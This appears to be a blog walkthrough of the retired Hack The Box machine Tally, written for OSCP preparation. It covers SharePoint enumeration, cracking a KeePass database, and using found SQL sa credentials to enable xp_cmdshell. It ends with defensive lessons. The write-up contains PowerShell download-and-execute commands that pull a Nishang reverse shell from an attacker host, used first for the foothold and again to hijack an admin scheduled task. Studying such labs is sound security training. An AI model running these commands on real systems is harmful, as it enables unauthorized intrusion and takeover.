This is the 44th blog out of a series of blogs I will be publishing on retired HTB machines in preparation for the OSCP. The full list of OSCP like machines compiled by TJ_Null can be found here.
Let’s get started!
Reconnaissance
Run the nmapAutomator script to enumerate open ports and services running on those ports.
./nmapAutomator.sh 10.10.10.59 All
- All: Runs all the scans consecutively.
Running all scans on 10.10.10.59Host is likely running Windows---------------------Starting Nmap Quick Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 01:57 EST Nmap scan report for 10.10.10.59 Host is up (0.043s latency). Not shown: 726 closed ports, 267 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 81/tcp open hosts2-ns 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 808/tcp open ccproxy-httpNmap done: 1 IP address (1 host up) scanned in 2.56 seconds---------------------Starting Nmap Basic Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 01:57 EST Nmap scan report for 10.10.10.59 Host is up (0.15s latency).PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Bad Request 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 808/tcp open ccproxy-http? Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results: |_clock-skew: mean: 2m34s, deviation: 0s, median: 2m33s | ms-sql-info: | 10.10.10.59:1433: | Version: | name: Microsoft SQL Server 2016 RTM | number: 13.00.1601.00 | Product: Microsoft SQL Server 2016 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 |_smb-os-discovery: ERROR: Script execution failed (use -d to debug) | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-03-07T07:00:34 |_ start_date: 2020-03-07T06:59:02Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 110.28 seconds----------------------Starting Nmap UDP Scan---------------------- Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 01:59 EST Warning: 10.10.10.59 giving up on port because retransmission cap hit (1). Nmap scan report for 10.10.10.59 Host is up (0.19s latency). All 1000 scanned ports on 10.10.10.59 are closed (704) or open|filtered (296)Nmap done: 1 IP address (1 host up) scanned in 964.68 seconds---------------------Starting Nmap Full Scan---------------------- Nmap scan report for 10.10.10.59 Host is up (0.098s latency). Not shown: 61247 closed ports, 4268 filtered ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 81/tcp open hosts2-ns 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1433/tcp open ms-sql-s 5985/tcp open wsman 15567/tcp open unknown 32843/tcp open unknown 32844/tcp open unknown 32846/tcp open unknown 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49669/tcp open unknown 49670/tcp open unknownRead data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 179.34 seconds Raw packets sent: 88392 (3.889MB) | Rcvd: 76277 (3.051MB)Making a script scan on extra ports: 1433, 5985, 15567, 32843, 32844, 32846, 47001, 49664, 49665, 49666, 49667, 49668, 49669, 49670 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 02:18 EST Nmap scan report for 10.10.10.59 Host is up (0.081s latency).PORT STATE SERVICE VERSION 1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM | ms-sql-ntlm-info: | Target_Name: TALLY | NetBIOS_Domain_Name: TALLY | NetBIOS_Computer_Name: TALLY | DNS_Domain_Name: TALLY | DNS_Computer_Name: TALLY |_ Product_Version: 10.0.14393 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2020-03-07T06:59:32 |_Not valid after: 2050-03-07T06:59:32 |_ssl-date: 2020-03-07T07:22:19+00:00; +2m34s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 15567/tcp open http Microsoft IIS httpd 10.0 | http-auth: | HTTP/1.1 401 Unauthorized\x0D | Negotiate |_ NTLM | http-ntlm-info: | Target_Name: TALLY | NetBIOS_Domain_Name: TALLY | NetBIOS_Computer_Name: TALLY | DNS_Domain_Name: TALLY | DNS_Computer_Name: TALLY |_ Product_Version: 10.0.14393 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title. 32843/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Service Unavailable 32844/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Service Unavailable | ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US | Subject Alternative Name: DNS:localhost, DNS:tally | Not valid before: 2017-09-17T22:51:16 |_Not valid after: 9999-01-01T00:00:00 |_ssl-date: 2020-03-07T07:22:19+00:00; +2m34s from scanner time. | tls-alpn: | h2 |_ http/1.1 32846/tcp open storagecraft-image StorageCraft Image Manager 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results: |_clock-skew: mean: 2m34s, deviation: 0s, median: 2m33s | ms-sql-info: | 10.10.10.59:1433: | Version: | name: Microsoft SQL Server 2016 RTM | number: 13.00.1601.00 | Product: Microsoft SQL Server 2016 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 79.91 seconds---------------------Starting Nmap Vulns Scan--------------------- Running CVE scan on all ports Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 02:19 EST /usr/local/bin/nmapAutomator.sh: line 226: 2165 Segmentation fault $nmapType -sV --script vulners --script-args mincvss=7.0 -p$(echo "${ports}") -oN nmap/CVEs_"$1".nmap "$1"Running Vuln scan on all ports Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 02:20 EST Nmap scan report for 10.10.10.59 Host is up (0.040s latency).PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_sslv2-drown: 80/tcp open http Microsoft IIS httpd 10.0 |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-frontpage-login: | VULNERABLE: | Frontpage extension anonymous login | State: VULNERABLE | Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise. | | References: |_ http://insecure.org/sploits/Microsoft.frontpage.insecurities.html |_http-server-header: Microsoft-IIS/10.0 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-server-header: Microsoft-HTTPAPI/2.0 | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 135/tcp open msrpc Microsoft Windows RPC |_clamav-exec: ERROR: Script execution failed (use -d to debug) 139/tcp open netbios-ssn Microsoft Windows netbios-ssn |_clamav-exec: ERROR: Script execution failed (use -d to debug) 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds |_clamav-exec: ERROR: Script execution failed (use -d to debug) 808/tcp open ccproxy-http? |_clamav-exec: ERROR: Script execution failed (use -d to debug) 1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601 |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_sslv2-drown: |_tls-ticketbleed: ERROR: Script execution failed (use -d to debug) | vulners: | cpe:/a:microsoft:sql_server:2016: | CVE-2020-0618 6.5 https://vulners.com/cve/CVE-2020-0618 | CVE-2019-1068 6.5 https://vulners.com/cve/CVE-2019-1068 | CVE-2016-7250 6.5 https://vulners.com/cve/CVE-2016-7250 | CVE-2016-7249 6.5 https://vulners.com/cve/CVE-2016-7249 | CVE-2017-8516 5.0 https://vulners.com/cve/CVE-2017-8516 | CVE-2016-7251 4.3 https://vulners.com/cve/CVE-2016-7251 |_ CVE-2016-7252 4.0 https://vulners.com/cve/CVE-2016-7252 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 15567/tcp open http Microsoft IIS httpd 10.0 |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: |_ /_layouts/images/helpicon.gif: MS Sharepoint |_http-server-header: Microsoft-IIS/10.0 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 32843/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 32844/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-aspnet-debug: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_sslv2-drown: 32846/tcp open storagecraft-image StorageCraft Image Manager |_clamav-exec: ERROR: Script execution failed (use -d to debug) 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 49664/tcp open msrpc Microsoft Windows RPC |_clamav-exec: ERROR: Script execution failed (use -d to debug) 49665/tcp open msrpc Microsoft Windows RPC |_clamav-exec: ERROR: Script execution failed (use -d to debug) 49666/tcp open msrpc Microsoft Windows RPC |_clamav-exec: ERROR: Script execution failed (use -d to debug) 49667/tcp open msrpc Microsoft Windows RPC |_clamav-exec: ERROR: Script execution failed (use -d to debug) 49668/tcp open msrpc Microsoft Windows RPC |_clamav-exec: ERROR: Script execution failed (use -d to debug) 49669/tcp open msrpc Microsoft Windows RPC |_clamav-exec: ERROR: Script execution failed (use -d to debug) 49670/tcp open msrpc Microsoft Windows RPC |_clamav-exec: ERROR: Script execution failed (use -d to debug) Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results: |_samba-vuln-cve-2012-1182: No accounts left to try |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: No accounts left to tryService detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 839.56 seconds
We have 22 ports open.
- Port 21: running Microsoft ftpd
- Ports 80, 81, 5985, 32843, 32844 & 47001: running Microsoft HTTPAPI httpd 2.0
- Port 15567: running Microsoft IIS httpd 10.0
- Ports 139 & 445: running SMB
- Ports 135, 49664, 49665, 49666, 49667, 49668, 49669 & 49670: running Microsoft Windows RPC
- Port 808: running ccproxy-http
- Port 1433: running Microsoft SQL Server 2016
- Port 32846: running StorageCraft Image Manager
Before we move on to enumeration, let’s make some mental notes about the scan results.
- We have a bunch of ports running web servers. We’ll start off with enumerating port 80 and work our way down. I terminated nmapAutomator since it would have taken a very long time to enumerate all those ports.
- Nmap didn’t report anonymous login for FTP, so this is unlikely to be our point of entry, unless we get credentials. Nmap has reported this as a false negative before, so it is always good to manually verify it.
- Same goes for SMB. We’ll need credentials to access the service.
- Port 1433 is running a Microsoft SQL Server. If we can find a system administrator account, we’ll have code execution.
Enumeration
I always start off with enumerating HTTP.
Port 80 HTTP
Visit the application in the browser.
It’s running SharePoint. Since SharePoint has specific directories, we won’t use the normal word list when we gobuster it. Instead we’ll use a specific one to sharePoint.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -u 10.10.10.59
This outputs a ton of results to go through. It is easier to instead just do a google search on the important URLs in SharePoint and try those. One interesting entry is the viewlsts.aspx page that displays the site content.
We see that there is one document and one site page. Clicking on Documents we find a document titled ftp-details.
Download the document and view it.
FTP detailshostname: tallyworkgroup: htb.localpassword: UTDRSCH53c"$6hysPlease create your own user folder upon logging in
The document contains an FTP password but no username. Next, click on SitePages. This for some reason directs us to the following incorrect URL.
http://10.10.10.59/_layouts/15/start.aspx#/SitePages/Forms/AllPages.aspx
Simply removing the _layouts/15/start.aspx# portion of the URL allows us to view the site pages.
Click on the Finance Team page.
Now we have both a username and password to log into the FTP server!
Port 21 FTP
Log into FTP.
root@kali:~# ftp 10.10.10.59
Connected to 10.10.10.59.
220 Microsoft FTP Service
Name (10.10.10.59:root): ftp_user
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
View the files in the current directory.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
08-31-17 10:51PM <DIR> From-Custodian
10-01-17 10:37PM <DIR> Intranet
08-28-17 05:56PM <DIR> Logs
09-15-17 08:30PM <DIR> To-Upload
09-17-17 08:27PM <DIR> User
226 Transfer complete.
Navigating through the directories, we find a KeePass database in Tim’s directory.
ftp> pwd 257 "/User/Tim/Files" is current directory.ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 09-15-17 07:58PM 17 bonus.txt 09-15-17 08:24PM <DIR> KeePass-2.36 09-15-17 08:22PM 2222 tim.kdbx 226 Transfer complete
Download the database to our attack machine.
ftp> get tim.kdbx
The KeePass database is password protected. In order to crack the password using John the Ripper (JtR), we’ll have to extract a JtR compatible hash of the password. This can be done as follows.
keepass2john tim.kdbx > hash.txt
Then run JtR on the hash.
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
We get a hit back informing us that the password is “simplementeyo”.
Now we have all the information we need to open the KeePass database. To do that from the command line, we’ll use the kpcli program.
root@kali:~/Desktop/htb/tally# kpcli --kdb tim.kdbx
Going through the entries, we find two credentials. One of the credentials Finance/Acc0unting labelled Tally ACCT share will probably give us access to SMB, so we’ll start there.
Port 139 SMB
Let’s log into the ACCT share using the credentials we found.
root@kali:~/Desktop/htb/tally/smb# smbclient //10.10.10.59/ACCT -U FinanceEnter WORKGROUP\Finance's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Mon Sep 18 01:58:18 2017 .. D 0 Mon Sep 18 01:58:18 2017 Customers D 0 Sun Sep 17 16:28:40 2017 Fees D 0 Mon Aug 28 17:20:52 2017 Invoices D 0 Mon Aug 28 17:18:19 2017 Jess D 0 Sun Sep 17 16:41:29 2017 Payroll D 0 Mon Aug 28 17:13:32 2017 Reports D 0 Fri Sep 1 16:50:11 2017 Tax D 0 Sun Sep 17 16:45:47 2017 Transactions D 0 Wed Sep 13 15:57:44 2017 zz_Archived D 0 Fri Sep 15 16:29:35 2017 zz_Migration D 0 Sun Sep 17 16:49:13 2017 8387839 blocks of size 4096. 709452 blocks available
After enumerating all the directories, we find two interesting entries. The first is in the zz_Archived\SQL directory.
smb: \> cd \zz_Archived\SQLsmb: \zz_Archived\SQL\> dir . D 0 Fri Sep 15 16:29:36 2017 .. D 0 Fri Sep 15 16:29:36 2017 conn-info.txt A 77 Sun Sep 17 16:26:56 2017 8387839 blocks of size 4096. 709178 blocks availablesmb: \zz_Archived\SQL\> get conn-info.txt getting file \zz_Archived\SQL\conn-info.txt of size 77 as conn-info.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
View the content of the file on the attack machine.
old server detailsdb: sa pass: YE%TJC%&HYbe5Nwhave changed for tally
We have SQL credentials for an old server.
The other interesting entry we found is in the zz_Migration\Binaries\New folder directory.
The file tester.exe looks like a custom executable file. Download it to your attack machine.
get tester.exe
Use the strings command to print the list of printable characters in the file.
root@kali:~/Desktop/htb/tally/smb# strings tester.exe... WVS3 <$Xf ^_[3 SQLSTATE: Message: DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G; select * from Orchard_Users_UserPartRecord Unknown exception bad cast bad locale name false true generic iostream iostream stream error ios_base::badbit set ...
We get another SQL username and password.
username: sa
password: GWE3V65#6KFH93@4GWTG2G
Port 1433 SQL
Let’s test out the first credentials we found to log into the database.
sqsh -S 10.10.10.59 -U sa -P "YE%TJC%&HYbe5Nw"
- -S: server
- -U: username
- -P: password
We get a login failed error. Let’s test out the second credentials we found.
sqsh -S 10.10.10.59 -U sa -P "GWE3V65#6KFH93@4GWTG2G"
We’re in!
Since this is a System Administrator (SA) account, we should be able to run system commands.
Test out the whoami command using xp_cmdshell.
1> xp_cmdshell 'whoami';
2> go
Msg 15281, Level 16, State 1
Server 'TALLY', Procedure 'xp_cmdshell', Line 1 SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
We get an error telling us that the xp_cmdshell option is disabled. Since we have an account with the highest level of privilege (SA), we can simply enable it.
1> EXEC sp_configure 'show advanced options', 1;
2> go
Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE
statement to install.
(return status = 0)
1> RECONFIGURE;
2> go
1> EXEC sp_configure 'xp_cmdshell', 1;
2> go
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to
install.
(return status = 0)
1> RECONFIGURE;
2> go
Try the whoami command again.
Perfect, we finally have code execution!
Initial Foothold
Let’s use that to send a reverse shell to our attack machine.
Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.
cp ../../tools/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1
Add the following line to the end of the script with the attack machine configuration settings.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.45 -Port 1234
When called, this sends a reverse shell back to our attack machine on port 1234.
Start up a python server in the directory that the shell script resides in.
python -m SimpleHTTPServer 5555
Setup a listener to receive the reverse shell.
nc -nlvp 1234
Then download and execute the powershell script in SQL.
1> xp_cmdshell "powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.45:5555/shell.ps1')"
2> go
We get a shell!
Grab the user.txt flag.
Privilege Escalation
View the content of Sarah’s desktop directory.
PS C:\Users\Sarah\Desktop> dirDirectory: C:\Users\Sarah\DesktopMode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 01/10/2017 22:32 916 browser.bat -a---- 17/09/2017 21:50 845 FTP.lnk -a---- 23/09/2017 21:11 297 note to tim (draft).txt -a---- 19/10/2017 21:49 17152 SPBestWarmUp.ps1 -a---- 19/10/2017 22:48 11010 SPBestWarmUp.xml -a---- 17/09/2017 21:48 1914 SQLCMD.lnk -a---- 21/09/2017 00:46 129 todo.txt -ar--- 31/08/2017 02:04 32 user.txt -a---- 17/09/2017 21:49 936 zz_Migration.lnk
There’s two interesting files SPBestWarmUp.ps1 and SPBestWarmUp.xml. Looking through the SPBestWarmUp.xml script we see that it is running the SPBestWarmUp.ps1 with Administrator privileges every hour (indicated by the field <Interval>PT1H</Interval>) . This is probably run as a scheduled task. We can confirm that once we get a reverse shell with administrator privileges.
<CalendarTrigger> <Repetition> <Interval>PT1H</Interval> <Duration>P1D</Duration> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <StartBoundary>2017-01-25T01:00:00</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger>....<Principals> <Principal id="Author"> <UserId>TALLY\Administrator</UserId> <LogonType>Password</LogonType> <RunLevel>HighestAvailable</RunLevel> </Principal> </Principals>....<Actions Context="Author"> <Exec> <Command>PowerShell.exe</Command> <Arguments>-ExecutionPolicy Bypass -File SPBestWarmUp.ps1 -skipadmincheck</Arguments> <WorkingDirectory>C:\Users\Sarah\Desktop</WorkingDirectory> </Exec> </Actions>
Let’s view the permissions on SPBestWarmUp.ps1.
PS C:\Users\Sarah\Desktop> Get-Acl SPBestWarmUp.ps1 | Format-ListPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Sarah\Desktop\SPBestWarmUp.ps1 Owner : TALLY\Sarah Group : TALLY\None Access : NT AUTHORITY\SYSTEM Allow FullControl BUILTIN\Administrators Allow FullControl TALLY\Sarah Allow FullControl Audit : Sddl : O:S-1-5-21-1971769256-327852233-3012798916-1000G:S-1-5-21-1971769256-327852233-3012798916-513D:(A;ID;FA;;;SY)( A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-1971769256-327852233-3012798916-1000)
As the user Sarah, we own the file. Therefore, we could simply change the content of the file to include a reverse shell and wait until the hour changes and the scheduled task gets executed with administrator privileges.
Change the content of the script to send a reverse shell back to our attack machine.
echo "iex(new-object net.webclient).downloadstring('http://10.10.14.45:5555/shell-2.ps1')" > SPBestWarmUp.ps1
Wait until the scheduled task is run. We get a shell!
We can view the scheduled tasks using the following command.
Grab the root.txt flag.
Lessons Learned
To gain an initial foothold on the box we exploited four vulnerabilities.
- Insecure SharePoint permissions. An anonymous user was allowed to access SharePoint content. We used that to our advantage to enumerate site pages and documents on SharePoint. The administrator should have secured/restricted external anonymous access, especially when it is a public facing website.
- Cleartext FTP credentials. After enumerating the content saved on SharePoint, we found a document that contains an FTP password and a site page that contains the username that corresponded to the password. We then used these credentials to log into the FTP server. Sensitive information should not be stored in cleartext and permission restrictions should be put in place that prevent an unauthorized user from accessing files that contain sensitive information.
- Weak authentication credentials. After logging into the FTP server, we found a KeePass database that was protected with a weak password. Clearly, the user is security-aware and therefore is using a KeePass database to store his passwords. However, the password to the database was not strong enough and therefore we were able to crack it in a matter of seconds and gain access to all the other passwords that the user had stored in the database. The user should have used a strong password that is difficult to crack.
- Hardcoded password in an executable. After cracking the password for the KeePass database, we found SMB credentials that allowed us to log into one the shares. There, we found a custom executable file that contained a hardcoded SQL system administrator (SA) password. Using these credentials, we logged into the SQL database and executed system commands to gain initial access on the box. It’s considered insecure practice to store passwords in applications. If it is absolutely necessary, there are several ways you can obscure these passwords and make it harder for an attacker to discover the passwords. However, with enough skill, time and motive, the attacker will be able recover the passwords.
To escalate privileges we exploited one vulnerability.
- Security misconfiguration. There is a scheduled task that runs a user owned file with administrator privileges. Since we owned the file, we simply changed the content of the file to send a reverse shell back to our attack machine. To avoid this vulnerability, the scheduled task should have been run with user privileges as apposed to administrator privileges. Or, restrictions should have been put on the script that only allow an administrator to change the file.
0 comments:
Post a Comment